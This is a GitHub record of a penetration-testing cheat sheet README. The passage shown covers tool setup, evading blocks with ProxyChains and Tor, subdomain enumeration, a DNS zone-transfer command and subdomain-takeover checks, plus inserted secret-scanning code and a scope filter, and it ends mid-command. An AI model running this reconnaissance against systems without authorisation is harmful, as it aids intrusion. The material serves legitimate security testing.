{"id":13404967,"url":"https://github.com/ivan-sincek/penetration-testing-cheat-sheet","last_synced_at":"2025-02-27T23:45:40.664Z","repository":{"id":41348171,"uuid":"212625433","full_name":"ivan-sincek/penetration-testing-cheat-sheet","owner":"ivan-sincek","description":"Work in progress...","archived":false,"fork":false,"pushed_at":"2025-02-03T08:42:41.000Z","size":1615,"stargazers_count":680,"open_issues_count":0,"forks_count":140,"subscribers_count":24,"default_branch":"master","last_synced_at":"2025-02-03T09:36:27.568Z","etag":null,"topics":["bug-bounty","ethical-hacking","offensive-security","penetration-testing","red-team-engagement","security","web","web-penetration-testing"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-10-03T16:23:11.000Z","updated_at":"2025-02-03T08:42:46.000Z","dependencies_parsed_at":"2024-05-21T21:29:24.347Z","dependency_job_id":"6a40871e-7e87-48e9-97ea-ebfa2161c613","html_url":"https://github.com/ivan-sincek/penetration-testing-cheat-sheet","commit_stats":{"total_commits":9,"total_committers":1,"mean_commits":9.0,"dds":0.0,"last_synced_commit":"ee66106a9d99c1db3c1c915dda2edc2d4c4519dc"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-
testing-cheat-sheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/penetration-testing-cheat-sheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241076997,"owners_count":19905704,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","ethical-hacking","offensive-security","penetration-testing","red-team-engagement","security","web","web-penetration-testing"],"created_at":"2024-07-30T19:01:53.891Z","updated_at":"2025-02-27T23:45:40.637Z","avatar_url":"https://github.com/ivan-sincek.png","language":"PHP","funding_links":[],"categories":["PHP","ASP.NET","ASP.NET (1)","HarmonyOS","Pentesting"],"sub_categories":["Windows Manager","ARM"],"readme":"# Penetration Testing Cheat Sheet\n\nThis is more of a checklist for myself. May contain useful tips and tricks.\n\nEverything was tested on Kali Linux v2023.1 (64-bit).\n\nFor help with any of the tools write `\u003ctool_name\u003e [-h | -hh | --help]` or `man \u003ctool_name\u003e`.\n\nSometimes `-h` can be mistaken for a host or some other option. If that's the case, use `-hh` or `--help` instead, or read the manual with `man`.\n\nSome tools do similar tasks, but get slightly different results. 
Run everything you can. Many tools also complement each other!\n\nKeep in mind when no protocol nor port number in a URL is specified, i.e., if you specify only `somesite.com`, some tools will default to HTTP protocol and port 80.\n\nIf you didn't already, read [OWASP Web Security Testing Guide](https://github.com/OWASP/wstg). Checklist can be downloaded [here](https://github.com/OWASP/wstg/tree/master/checklists).\n\nHighly recommend reading [Common Security Issues in Financially-Orientated Web](https://soroush.me/downloadable/common-security-issues-in-financially-orientated-web-applications.pdf).\n\nHighly recommend doing [PortSwigger Web Security Academy](https://portswigger.net/web-security/all-labs), very underrated and super cheap.\n\nWebsites that you should use while writing the report:\n\n* [cwe.mitre.org/data](https://cwe.mitre.org/data)\n* [owasp.org/projects](https://owasp.org/projects)\n* [owasp.org/www-project-top-ten](https://owasp.org/www-project-top-ten)\n* [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html)\n* [first.org/cvss/calculator/4.0](https://www.first.org/cvss/calculator/4.0)\n* [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository)\n* [attack.mitre.org](https://attack.mitre.org)\n\nMy other cheat sheets:\n\n* [WiFi Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/wifi-penetration-testing-cheat-sheet)\n* [iOS Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet)\n* [Android Testing Cheat Sheet](https://github.com/ivan-sincek/android-penetration-testing-cheat-sheet)\n\n## Table of Contents\n\n**0. [Install Tools and Setup](#0-install-tools-and-setup)**\n\n* [API Keys](#api-keys)\n* [User-Agents](#user-agents)\n* [DNS Resolvers](#dns-resolvers)\n* [ProxyChains-NG](#proxychains-ng)\n\n**1. 
[Reconnaissance](#1-reconnaissance)**\n\n* [Useful Websites](#11-useful-websites)\n* [Dmitry](#dmitry)\n* [theHarvester](#theharvester)\n* [FOCA](#foca-fingerprinting-organizations-with-collected-archives)\n* [uncover](#uncover)\n* [assetfinder](#assetfinder)\n* [Sublist3r](#sublist3r)\n* [Subfinder](#subfinder)\n* [Amass](#amass)\n* [dig](#dig)\n* [Fierce](#fierce)\n* [DNSRecon](#dnsrecon)\n* [host](#host)\n* [WHOIS, ASN, CIDR](#whois-asn-cidr)\n* [ASNmap](#asnmap)\n* [httpx](#httpx)\n* [gau](#gau)\n* [urlhunter](#urlhunter)\n* [Google Dorks](#google-dorks)\n* [Chad](#chad)\n* [PhoneInfoga](#phoneinfoga)\n* [git-dumper](#git-dumper)\n* [TruffleHog](#trufflehog)\n* [File Scraper](#file-scraper)\n* [katana](#katana)\n* [Scrapy Scraper](#scrapy-scraper)\n* [Directory Fuzzing](#directory-fuzzing)\n* [DirBuster](#dirbuster)\n* [feroxbuster](#feroxbuster)\n* [snallygaster](#snallygaster)\n* [IIS Tilde Short name Scanning](#iis-tilde-short-name-scanning)\n* [WhatWeb](#whatweb)\n* [Parsero](#parsero)\n* [EyeWitness](#eyewitness)\n* [Wordlists](#wordlists)\n\n**2. [Scanning/Enumeration](#2-scanningenumeration)**\n\n* [Useful Websites](#21-useful-websites)\n* [Nmap](#nmap)\n* [testssl.sh](#testsslsh)\n* [OpenSSL](#openssl)\n* [keytool](#keytool)\n\n**3. 
[Vulnerability Assesment/Exploiting](#3-vulnerability-assesmentexploiting)**\n\n* [Useful Websites](#31-useful-websites)\n* [Collaborator Servers](#collaborator-servers)\n* [Subdomain Takeover](#subdomain-takeover)\n* [Subzy](#subzy)\n* [subjack](#subjack)\n* [Bypassing the 401 and 403](#bypassing-the-401-and-403)\n* [Nikto](#nikto)\n* [WPScan](#wpscan)\n* [Nuclei](#Nuclei)\n* [Arjun](#arjun)\n* [WFUZZ](#wfuzz)\n* [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor)\n* [HTTP Response Splitting](#http-response-splitting)\n* [Cross-Site Scripting \\(XSS\\)](#cross-site-scripting-xss)\n* [SQL Injection](#sql-injection)\n* [sqlmap](#sqlmap)\n* [dotdotpwn](#dotdotpwn)\n* [Web Shells](#web-shells)\n* [Send a Payload With Python](#send-a-payload-with-python)\n\n**4. [Post Exploitation](#4-post-exploitation)**\n\n* [Useful Websites](#41-useful-websites)\n* [Generate a Reverse Shell Payload for Windows OS](#generate-a-reverse-shell-payload-for-windows-os)\n* [PowerShell Encoded Command](#powershell-encoded-command)\n\n**5. [Password Cracking](#5-password-cracking)**\n\n* [Useful Websites](#51-useful-websites)\n* [crunch](#crunch)\n* [hash-identifier](#hash-identifier)\n* [Hashcat](#hashcat)\n* [Cracking the JWT](#cracking-the-jwt)\n* [Hydra](#hydra)\n* [Password Spraying](#password-spraying)\n\n**6. [Social Engineering](#6-social-engineering)**\n\n* [Drive-by Download](#drive-by-download)\n* [Phishing Website](#phishing-website)\n\n**7. [Miscellaneous](#7-miscellaneous)**\n\n* [Useful Websites](#71-useful-websites)\n* [cURL](#curl)\n* [Ncat](#ncat)\n* [multi/handler](#multihandler)\n* [ngrok](#ngrok)\n* [Additional References](#additional-references)\n\n## 0. 
Install Tools and Setup\n\nMost tools can be installed with the Linux package manager:\n\n```bash\napt-get update \u0026\u0026 apt-get -y install sometool\n```\n\nFor more information visit [kali.org/tools](https://www.kali.org/tools).\n\n---\n\nSome Python tools need to be downloaded and installed manually:\n\n```fundamental\npython3 setup.py install\n```\n\nOr, installed from [PyPI](https://pypi.org):\n\n```fundamental\npip3 install sometool\n\npython3 -m pip install sometool\n```\n\n---\n\nSome Golang tools need to be downloaded and built manually:\n\n```fundamental\ngo build sometool.go\n```\n\nOr, installed directly:\n\n```fundamental\ngo install -v github.com/user/sometool@latest\n```\n\nFor more information visit [pkg.go.dev](https://pkg.go.dev).\n\nTo set up Golang, run:\n\n```bash\napt-get -y install golang\n\necho \"export GOROOT=/usr/lib/go\" \u003e\u003e ~/.zshrc\necho \"export GOPATH=$HOME/go\" \u003e\u003e ~/.zshrc\necho 'export PATH=$GOPATH/bin:$GOROOT/bin:$PATH' \u003e\u003e ~/.zshrc\n\nsource ~/.zshrc\n```\n\nThe third line is single-quoted on purpose: `$GOPATH` and `$GOROOT` are written literally and expanded when the shell starts, not at the time of writing (when they are still unset and would expand to nothing). If you use another shell, write to `~/.bashrc`, etc., instead.\n\n---\n\nSome tools that come as binaries or shell scripts can be moved to the `/usr/bin/` directory for ease of use:\n\n```bash\nmv sometool.sh /usr/bin/sometool \u0026\u0026 chmod +x /usr/bin/sometool\n```\n\n---\n\nSome Java tools need to be downloaded and run manually with Java (JRE):\n\n```fundamental\njava -jar sometool.jar\n```\n\n### API Keys\n\nList of useful APIs to integrate in your tools:\n\n* [scrapeops.io](https://scrapeops.io) - bot-safe User-Agents\n* [shodan.io](https://developer.shodan.io) - IoT search engine and more\n* [censys.io](https://search.censys.io/api) - domain lookup and more\n* [github.com](https://github.com/settings/tokens) - public source code repository lookup\n* [virustotal.com](https://developers.virustotal.com/reference/overview) - malware database lookup\n* [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) 
- ProjectDiscovery tools\n\n### User-Agents\n\nDownload a list of bot-safe User-Agents, requires [scrapeops.io](https://scrapeops.io) API key:\n\n```python\npython3 -c 'import requests; open(\"./user_agents.txt\", \"w\").write(\"\\n\".join(requests.get(\"https://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY\u0026num_results=100\").json()[\"result\"]))'\n```\n\n### DNS Resolvers\n\nDownload a list of trusted DNS resolvers, or manually from [trickest/resolvers](https://github.com/trickest/resolvers):\n\n```python\npython3 -c 'import requests; open(\"./resolvers.txt\", \"w\").write(requests.get(\"https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt\").text)'\n```\n\nKeep TLS certificate verification enabled for these downloads (do not pass `verify=False`) and use HTTPS: an API key sent over plain HTTP is exposed on the path, and a resolver list fetched over an unverified connection can be tampered with by anyone in between.\n\n### ProxyChains-NG\n\nIf Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass the restriction.\n\nInstallation:\n\n```bash\napt-get update \u0026\u0026 apt-get -y install proxychains4 tor torbrowser-launcher\n```\n\nMake the following changes in `/etc/proxychains4.conf`:\n\n```fundamental\nround_robin\nchain_len = 1\nproxy_dns\nremote_dns_subnet 224\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks5 127.0.0.1 9050\n```\n\nMake sure to comment out any chain type other than `round_robin` - e.g., change `strict_chain` into `# strict_chain`.\n\nStart Tor:\n\n```fundamental\nservice tor start\n```\n\nThen, run any tool you want:\n\n```fundamental\nproxychains4 sometool\n```\n\nUsing only Tor most likely won't be enough; you will need to add more proxies \\([1](https://geonode.com/free-proxy-list)\\)\\([2](https://proxyscrape.com/home)\\) to `/etc/proxychains4.conf`. However, it is hard to find free and stable proxies that are not already blacklisted, and any free proxy can read or modify unencrypted traffic you send through it, so never route authenticated or client-sensitive requests through one.\n\nDownload a list of free proxies:\n\n```bash\ncurl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50\u0026page=1\u0026sort_by=lastChecked\u0026sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | 
jq -r '.data[] | \"\\(.protocols[]) \\(.ip) \\(.port)\"' \u003e proxychains.txt\n\ncurl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50\u0026page=1\u0026sort_by=lastChecked\u0026sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | \"\\(.protocols[])://\\(.ip):\\(.port)\"' \u003e proxies.txt\n```\n\n## 1. Reconnaissance\n\nKeep in mind that some \\[legacy\\] websites might only be accessible through specific web browsers such as Internet Explorer or Edge.\n\nKeep in mind that some websites may be missing the index page and may not redirect you to the real home page. If that's the case, try to manually guess a full path to the home page, use [wayback machine](https://archive.org) or [gau](#gau) to find old URLs, or try directory fuzzing with [Feroxbuster](#feroxbuster) or [DirBuster](#dirbuster).\n\nSearch the Internet for default / pre-defined paths and files for a specific web application. Use the gathered information in combination with [Google Dorks](#google-dorks), [Chad](#chad), and [httpx](#httpx) to find the same paths and files on different domains. For not so common web applications, try to find and browse the source code for default / pre-defined paths and files.\n\nYou can find the application's source code on [GitHub](https://github.com), [GitLab](https://about.gitlab.com), [searchcode](https://searchcode.com), etc.\n\nSearch the application's source code for API keys, credentials, secrets, tokens, hosts, etc., with [TruffleHog](#trufflehog) and [File Scraper](#file-scraper). Don't forget to check old GitHub commits for old but still active API keys, credentials, secrets, tokens, etc.\n\nInspect the web console for possible errors. 
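The source-code search for API keys, credentials and tokens described above rests on two techniques: matching known secret formats, and flagging high-entropy strings assigned to secret-looking names. The following is an added example, not code from this cheat sheet or from TruffleHog; the settings excerpt it scans is constructed, every secret-looking value in it is fake (the AWS one is the placeholder from the AWS documentation), and the fixed token lengths in the patterns are assumptions:

```python
"""Added example (not code from the cheat sheet or from TruffleHog): a minimal
secret scanner that combines known-format patterns with a Shannon-entropy check,
the two techniques scanners such as TruffleHog build on. The sample text below
is constructed for the demonstration and every secret-looking value in it is fake."""
import math
import re

# Known-format detectors. The prefixes are the documented ones; the fixed
# lengths are the commonly published formats and are an assumption here.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}

# Generic detector: a secret-looking variable name assigned a long token.
ASSIGNMENT = re.compile(
    r"""(?i)(api[_-]?key|secret|token|password|passwd)[a-z_]*\s*[:=]\s*['"]?([A-Za-z0-9+/=_\-]{16,})"""
)


def shannon_entropy(value):
    """Bits per character: 0.0 for a repeated character, log2(len) when all differ."""
    if not value:
        return 0.0
    n = len(value)
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(text, entropy_threshold=3.5):
    """Return (line_no, kind, match) for every hit. Fixed-format hits are reported
    regardless of entropy; generic assignments only when the value is above the
    threshold, which drops placeholders such as repeated characters."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                findings.append((no, kind, m.group(0)))
        for m in ASSIGNMENT.finditer(line):
            value = m.group(2)
            if shannon_entropy(value) >= entropy_threshold:
                findings.append((no, "high_entropy_" + m.group(1).lower(), value))
    return findings


# Constructed sample (all values fake; AKIAIOSFODNN7EXAMPLE is the AWS docs placeholder).
SAMPLE = """# settings.py excerpt pulled from an old commit
db_host = db.internal.example
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
password = "aaaaaaaaaaaaaaaaaaaa"
API_TOKEN = "aB3dE5fG7hJ9kL1mN2oP4qR6sT8uV0wX"
github_pat = ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for no, kind, value in scan_text(SAMPLE):
        print(f"line {no}: {kind}: {value}")
```

Run it as-is to print the four findings; to cover old commits as recommended above, feed `scan_text()` the output of `git log -p` rather than only the checked-out tree. The 3.5 bits-per-character threshold is a tuning assumption: lowering it catches shorter secrets at the cost of false positives from ordinary identifiers, which is why the fixed-format patterns are reported unconditionally.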
Inspect the application's source code for possible comments.\n\n**Don't forget to access the web server over an IP address because you might find server's default welcome page or some other content.**\n\n### 1.1 Useful Websites\n\n* [whois.domaintools.com](https://whois.domaintools.com)\n* [otx.alienvault.com](https://otx.alienvault.com) - domain lookup\n* [reverseip.domaintools.com](https://reverseip.domaintools.com) - web-based reverse IP lookup\n* [lookup.icann.org](https://lookup.icann.org)\n* [sitereport.netcraft.com](https://sitereport.netcraft.com)\n* [searchdns.netcraft.com](https://searchdns.netcraft.com) - web-based DNS lookup\n* [search.censys.io](https://search.censys.io) - domain lookup and more\n* [crt.sh](https://crt.sh) - certificate fingerprinting\n* [commoncrawl.org](https://commoncrawl.org/get-started) - web crawl dumps\n* [opendata.rapid7.com](https://opendata.rapid7.com) - scan dumps\n* [searchcode.com](https://searchcode.com)\n* [virustotal.com](https://www.virustotal.com/gui/home/search) - malware database lookup\n* [haveibeenpwned.com](https://haveibeenpwned.com)\n* [intelx.io](https://intelx.io) - database breaches\n* [search.wikileaks.org](https://search.wikileaks.org)\n* [archive.org](https://archive.org) - wayback machine\n* [pgp.circl.lu](https://pgp.circl.lu) - OpenPGP key server\n* [shodan.io](https://www.shodan.io) - IoT search engine\n* [sherlockeye.io](https://sherlockeye.io) - account lookup\n* [whoisds.com](https://www.whoisds.com/newly-registered-domains) - newly registered domains\n* [radar.cloudflare.com](https://radar.cloudflare.com) - website lookup and more\n\n### Dmitry\n\nGather information:\n\n```fundamental\ndmitry -wines -o dmitry_results.txt somedomain.com\n```\n\nDeprecated. 
Netcraft search does not work.\n\n### theHarvester\n\nGather information:\n\n```fundamental\ntheHarvester -f theharvester_results.json -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,duckduckgo,hackertarget,otx,threatminer,urlscan,yahoo -l 500 -d somedomain.com\n```\n\nThis tool changes its supported search engines quite often, so some of them might not work as of this reading.\n\nSometimes the output file might default to the `/usr/lib/python3/dist-packages/theHarvester/` directory.\n\nExtract hostnames from the results:\n\n```bash\njq -r '.hosts[]' theharvester_results.json | sort -uf | tee -a subdomains.txt\n```\n\nExtract IPs from the results:\n\n```bash\njq -r '.ips[]' theharvester_results.json | sort -uf | tee -a ips.txt\n```\n\nExtract emails from the results:\n\n```bash\njq -r '.emails[]' theharvester_results.json | sort -uf | tee -a emails.txt\n```\n\nExtract ASNs from the results:\n\n```bash\njq -r '.asns[]' theharvester_results.json | sort -uf | tee -a asns.txt\n```\n\n### FOCA (Fingerprinting Organizations with Collected Archives)\n\nFind metadata and hidden information in files.\n\nTested on Windows 10 Enterprise OS (64-bit).\n\nMinimum requirements:\n\n* download and install [MS SQL Server 2014 Express](https://www.microsoft.com/en-us/download/details.aspx?id=42299) or greater,\n* download and install [MS .NET Framework 4.7.1 Runtime](https://dotnet.microsoft.com/download/dotnet-framework/net471) or greater,\n* download and install [MS Visual C++ 2010 (64-bit)](https://www.microsoft.com/en-us/download/developer-tools.aspx) or greater,\n* download and install [FOCA](https://github.com/ElevenPaths/FOCA/releases).\n\nThe GUI is very intuitive.\n\n### uncover\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/uncover/cmd/uncover@latest\n```\n\nSet your API keys in `/root/.config/uncover/provider-config.yaml` as follows:\n\n```fundamental\nshodan:\n  - SHODAN_API_KEY\ncensys:\n  - CENSYS_API_ID:CENSYS_API_SECRET\n```\n\nGather information 
using Shodan, Censys, and more:\n\n```bash\nuncover -json -o uncover_results.json -l 100 -e shodan,censys -q somedomain.com\n\njq -r '.host // empty' uncover_results.json | sort -uf | tee -a subdomains.txt\n\njq -r '.ip // empty' uncover_results.json | sort -uf | tee -a ips.txt\n```\n\nTO DO: More Shodan and Censys Dorks.\n\n### assetfinder\n\nGather subdomains using OSINT:\n\n```bash\nassetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt\n```\n\n### Sublist3r\n\nGather subdomains using OSINT:\n\n```fundamental\nsublist3r -o sublister_results.txt -d somedomain.com\n```\n\n### Subfinder\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest\n```\n\nGather subdomains using OSINT:\n\n```fundamental\nsubfinder -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com\n```\n\n**Subfinder has built-in DNS resolvers.**\n\nSet your API keys in `/root/.config/subfinder/config.yaml` file as following:\n\n```fundamental\nshodan:\n  - SHODAN_API_KEY\ncensys:\n  - CENSYS_API_ID:CENSYS_API_SECRET\ngithub:\n  - GITHUB_API_KEY\nvirustotal:\n  - VIRUSTOTAL_API_KEY\n```\n\n### Amass\n\nGather subdomains using OSINT:\n\n```fundamental\namass enum -o amass_results.txt -trf resolvers.txt -d somedomain.com\n```\n\n**Amass has built-in DNS resolvers.**\n\nTo find ASNs from IPs and CIDRs from ASNs, use [WHOIS](#whois-asn-cidr). The below ASN and CIDR scans will take a long time to finish. 
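ASN and CIDR pivots routinely return addresses and names that belong to the hosting provider or to unrelated tenants, so filter them against the client-approved scope before anything goes into Nmap or httpx. The following is an added example, not code from this cheat sheet or from Amass; the scope CIDRs and root domain are hypothetical placeholders, and the input list is constructed:

```python
"""Added example (not code from the cheat sheet or from Amass): filter ASN/CIDR
and OSINT results against the client-approved scope before scanning them.

The scope values below are hypothetical; take the real ones from the rules of
engagement. Input is a mixed list of IPs, CIDRs and hostnames, one per line, as
produced by the ips.txt / cidrs.txt / subdomains.txt pipelines on this page."""
import ipaddress

# Hypothetical scope definition (constructed for this example).
SCOPE_CIDRS = ["192.168.8.0/24", "10.10.0.0/16"]
SCOPE_DOMAINS = ["somedomain.com"]


def parse_networks(cidrs):
    """Parse the approved CIDRs once; strict=False tolerates host bits being set."""
    return [ipaddress.ip_network(c.strip(), strict=False) for c in cidrs]


def ip_in_scope(ip, networks):
    """True if the single address falls inside any approved network."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        return False
    return any(addr in net for net in networks)


def cidr_in_scope(cidr, networks):
    """True only if the whole block is contained in an approved network; a supernet
    of an approved block (e.g. the ASN's full /16) merely overlaps and is NOT in scope."""
    try:
        net = ipaddress.ip_network(cidr.strip(), strict=False)
    except ValueError:
        return False
    return any(net.version == s.version and net.subnet_of(s) for s in networks)


def host_in_scope(host, domains):
    """Exact domain or a real subdomain of it (label boundary required); rejects
    look-alikes such as 'notsomedomain.com' and 'somedomain.com.evil.net'."""
    h = host.strip().rstrip(".").lower()
    return any(h == d or h.endswith("." + d) for d in domains)


def filter_results(lines, cidrs=SCOPE_CIDRS, domains=SCOPE_DOMAINS):
    """Split recon output into (in_scope, out_of_scope), both sorted and de-duplicated."""
    networks = parse_networks(cidrs)
    in_scope, out_of_scope = set(), set()
    for raw in lines:
        item = raw.strip()
        if not item or item.startswith("#"):
            continue
        if "/" in item:
            ok = cidr_in_scope(item, networks)
        else:
            try:
                ipaddress.ip_address(item)
                ok = ip_in_scope(item, networks)
            except ValueError:
                ok = host_in_scope(item, domains)
        (in_scope if ok else out_of_scope).add(item)
    return sorted(in_scope, key=str.lower), sorted(out_of_scope, key=str.lower)


# Constructed sample of what amass intel / whois / subfinder might hand back.
SAMPLE = """192.168.8.5
192.168.9.5
10.10.3.7
192.168.8.0/25
192.168.0.0/16
mail.somedomain.com
somedomain.com
somedomain.com.evil-lookalike.net
notsomedomain.com
cdn.partner-of-somedomain.com
"""

if __name__ == "__main__":
    ok, bad = filter_results(SAMPLE.splitlines())
    print("in scope:", *ok, sep="\n  ")
    print("OUT OF SCOPE (do not scan):", *bad, sep="\n  ")
```

Feed it the concatenation of `ips.txt`, `cidrs.txt` and `subdomains.txt`. A CIDR is accepted only when it is fully contained in an approved block, so an ASN-wide `/16` that merely overlaps the scope is rejected rather than silently expanding it, and hostname matching requires a real label boundary so `notsomedomain.com` is not mistaken for a subdomain.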
**The results might not all be within the scope allowed by the client!**\n\nGather subdomains from [ASN](https://www.arin.net/resources/guide/asn):\n\n```fundamental\namass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337\n```\n\nGather subdomains from [CIDR](https://aws.amazon.com/what-is/cidr):\n\n```fundamental\namass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24\n```\n\n### dig\n\nFetch name servers:\n\n```fundamental\ndig +noall +answer -t NS somedomain.com\n```\n\nFetch mail exchange servers:\n\n```fundamental\ndig +noall +answer -t MX somedomain.com\n```\n\nInterrogate a domain name server:\n\n```fundamental\ndig +noall +answer -t ANY somedomain.com @ns.somedomain.com\n```\n\nFetch the zone file from a domain name server (zone transfer; only a misconfigured server will allow this from an arbitrary client):\n\n```fundamental\ndig +noall +answer -t AXFR somedomain.com @ns.somedomain.com\n```\n\nReverse IP lookup:\n\n```fundamental\ndig +noall +answer -x 192.168.8.5\n```\n\n\\[Subdomain Takeover\\] Check if domains/subdomains are dead, look for `NXDOMAIN`, `SERVFAIL`, or `REFUSED` status codes:\n\n```bash\nfor subdomain in $(cat subdomains.txt); do res=$(dig \"${subdomain}\" -t A +noall +comments +timeout=3 | grep -Po '(?\u003c=status\\:\\ )[^\\s]+(?\u003c!\\,)'); echo \"${subdomain} | ${res}\"; done | sort -uf | tee -a subdomains_to_status.txt\n\ngrep -v 'NOERROR' subdomains_to_status.txt | grep -Po '[^\\s]+(?=\\ \\|)' | sort -uf | tee -a subdomains_errors.txt\n\ngrep 'NOERROR' subdomains_to_status.txt | grep -Po '[^\\s]+(?=\\ \\|)' | sort -uf | tee -a subdomains_errors_none.txt\n```\n\nSee the [host](#host) tool for the next step.\n\n### Fierce\n\nInterrogate domain name servers:\n\n```fundamental\nfierce -file fierce_std_results.txt --domain somedomain.com\n\nfierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com\n```\n\n**By default, Fierce will perform a dictionary attack with its built-in wordlist.**\n\n### DNSRecon\n\nInterrogate domain name 
servers:\n\n```fundamental\ndnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com\n\ndnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com\n\ndnsrecon -v --iw -f --lifetime 3 --threads 50 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com\n```\n\nDNSRecon can perform a dictionary attack with a user-defined wordlist, but make sure to specify a full path to the wordlist; otherwise, DNSRecon might not recognize it.\n\nMake sure to specify a full path to the output file; otherwise, it will default to the `/usr/share/dnsrecon/` directory, i.e., the tool's own directory.\n\nExtract hostnames from the standard/zone transfer/brute force results:\n\n```bash\njq -r '.[] | select(.type | test(\"^A$|^CNAME$|^MX$|^NS$|^PTR$\")) | .exchange // empty, .name // empty, .target // empty' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt\n```\n\nExtract IPs from the standard/zone transfer/brute force results:\n\n```bash\njq -r '.[] | select(.type | test(\"^A$|^CNAME$|^MX$|^NS$|^PTR$\")) | .address // empty' dnsrecon_std_results.json | sort -uf | tee -a ips.txt\n```\n\n\\[Subdomain Takeover\\] Extract canonical names from the standard/zone transfer/brute force results:\n\n```bash\njq -r '.[] | select(.type | test(\"^CNAME$\")).target' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt\n```\n\nReverse IP lookup:\n\n```fundamental\ndnsrecon --json /root/Desktop/dnsrecon_reverse_results.json -s -r 192.168.8.0/24\n```\n\nExtract virtual hosts from the reverse IP lookup results:\n\n```bash\njq -r '.[] | if type == \"array\" then .[].name else empty end' dnsrecon_reverse_results.json | sort -uf | tee -a subdomains.txt\n```\n\n### host\n\n**Some DNS servers will not respond to DNS queries of type 'ANY', use type 'A' instead.**\n\nGather IPs for the given domains/subdomains (ask for `A` records):\n\n```bash\nfor subdomain in $(cat subdomains.txt); do res=$(host -t A \"${subdomain}\" | 
